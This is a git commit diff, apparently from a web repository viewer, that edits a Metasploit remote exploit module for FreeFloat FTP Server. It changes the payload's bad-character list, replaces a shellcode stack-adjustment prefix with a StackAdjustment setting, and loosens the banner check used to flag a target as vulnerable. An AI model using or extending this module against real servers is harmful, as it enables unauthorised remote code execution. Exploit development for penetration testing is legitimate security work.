...
parent
be36b466ec
commit
d33d6854b8
|
@ -35,8 +35,9 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
{
|
||||
'Space' => 500,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "\x00\x0a\x0d\x20\x5c",
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
#'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -59,11 +60,11 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
def check
|
||||
connect
|
||||
disconnect
|
||||
print_status(banner)
|
||||
if (banner =~ /220 FreeFloat Ftp Server (Version 1.00)/)
|
||||
if (banner =~ /FreeFloat/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
Loading…
Reference in New Issue